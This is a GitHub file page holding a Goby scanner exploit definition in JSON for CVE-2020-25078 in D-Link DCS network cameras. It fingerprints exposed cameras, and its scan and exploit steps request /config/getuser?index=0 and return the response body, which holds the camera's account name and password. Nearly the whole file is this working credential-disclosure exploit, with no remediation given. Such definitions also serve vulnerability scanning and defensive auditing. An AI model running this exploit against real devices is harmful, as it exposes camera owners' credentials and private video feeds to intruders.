forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathD_Link_DC_Disclosure_of_account_password_information.json
77 lines (77 loc) · 2.92 KB
/
D_Link_DC_Disclosure_of_account_password_information.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
{
"Name": "D-Link DC Disclosure of account password information (CVE-2020-25078)",
"Level": "2",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "app=\"DLink-Network-Camera\"",
"Description": "Account and password information disclosure D-Link DCS series monitoring obtains account and password information by accessing a specific URL, and attackers can access the video monitoring page by entering the background through the vulnerability",
"Product": "D-Link DC ",
"Homepage": "http://www.dlink.com.cn/",
"Author": "PeiQi",
"Impact": "<p>Attackers can access video monitoring page by loopholes into the backgroun<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/config/getuser?index=0",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "name",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "pass",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/config/getuser?index=0",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-04-04 21:23:30",
"GobyVersion": "1.8.255"
}